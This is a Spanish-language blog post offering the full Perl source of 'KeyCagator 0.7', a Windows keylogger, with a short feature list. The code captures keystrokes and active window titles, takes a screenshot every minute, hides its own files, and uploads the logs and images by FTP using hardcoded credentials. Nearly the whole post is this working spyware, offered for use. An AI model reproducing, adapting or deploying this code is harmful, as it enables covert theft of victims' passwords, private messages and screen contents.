En esta version ya es aceptable con las siguientes opciones
Captura letras reconociendo mayusculas y minusculas
Captura ventanas en la que se trabaja
Toma fotos del sistema cada 1 minuto
Sube logs y fotos tomadas por FTP
Oculta rastros
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 | #!usr/bin/perl #KeyCagator 0.7 (C) Doddy Hackman 2011 # use Win32::API; use Win32::GuiTest qw(GetForegroundWindow GetWindowText FindWindowLike SetForegroundWindow SendKeys); use Win32::Clipboard; use threads; use Net::FTP; use Win32::File; use Cwd; my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I"); my $tengo = 0; #if ($^O eq 'MSWin32') { #use Win32::Console; #Win32::Console::Free(); #} hideit($0,"hide"); subirftp("logs.txt","logs.txt"); my $comando1 = threads->new(\&capture_windows); my $comando2 = threads->new(\&capture_keys); my $comando3 = threads->new(\&capture_screen); $comando1->join(); $comando2->join(); $comando3->join(); sub capture_windows { while(1) { my $win1 = GetForegroundWindow(); my $win2 = GetForegroundWindow(); if($win1 != $win2){ my $nombre = GetWindowText($win1); chomp($nombre); if ($nombre ne "") { #print "\n\n[".$nombre."]\n\n"; savefile("logs.txt","\n\n[".$nombre."]\n\n"); } } } return 1; } sub capture_keys { while(1) { my $test1; my $test2; for my $num(0x30..0x39) { #Numbers if (dame($num)) { #print "number : ".chr($num)."\n"; savefile("logs.txt",chr($num)); } } if (dame(0x14)) { $test1 = 1; $tengo++; } for my $num(0x41..0x5A) { #Words if (dame($num)) { if (dame(0x20)) { savefile("logs.txt"," "); } if (dame(0x32)) { savefile("logs.txt","\n[enter]\n\n"); } unless (verpar($tengo) eq 1) { #print "MAYUSCULA : ".chr($num)."\n"; savefile("logs.txt",chr($num)); } if (dame(0x10) or dame(0xA0) or dame(0xA1)) { #print "MAYUSCULA : ".chr($num)."\n"; $test2 = 1; } unless ($test1 eq 1 or $test2 eq 1) { if ($num >= 0x41) { if ($num <= 0x5A) { if (verpar($tengo) eq 1) { #print "MINUSCULA : ".chr($num+32)."\n"; savefile("logs.txt",chr($num+32)); } } } } } } } return 1; } sub capture_screen { $numero = 0; while(1) { sleep 60; $numero++; SetForegroundWindow(1); SendKeys('%{PRTSCR}'); my $a = Win32::Clipboard::GetBitmap(); open (FOTO,">".$numero.".bmp"); binmode(FOTO); print FOTO $a; close FOTO; hideit($numero.".bmp","hide"); subirftp($numero.".bmp",$numero.".bmp"); } } sub dame { return($come->Call(@_) & 1); } sub savefile { open (SAVE,">>".$_[0]); print SAVE $_[1]; close SAVE; hideit($_[0],"hide"); } sub hideit { if ($_[1] eq "show") { Win32::File::SetAttributes($_[0],NORMAL); } elsif ($_[1] eq "hide") { Win32::File::SetAttributes($_[0],HIDDEN); } else { print "error\n"; } } sub subirftp { if ($ser = Net::FTP->new("localhost")) { if ($ser->login("doddy","123")) { print "subi".getcwd()."/".$_[0]."\n"; if ($ser->put(getcwd()."/".$_[0],$_[1])) { return true; } } $ser->close; } } sub verpar{ return ($_[0] % 2 == 0) ? "1" : "2"; } #Credits : to explorer for helpme with the function verpar() #Mail : lepuke[at]hotmail[com] #Blog : doddy-hackman.blogspot.com # ¿ The End ? |
0 comentarios: sobre keylogger 0.7 en perl
Publicar un comentario para keylogger 0.7 en perl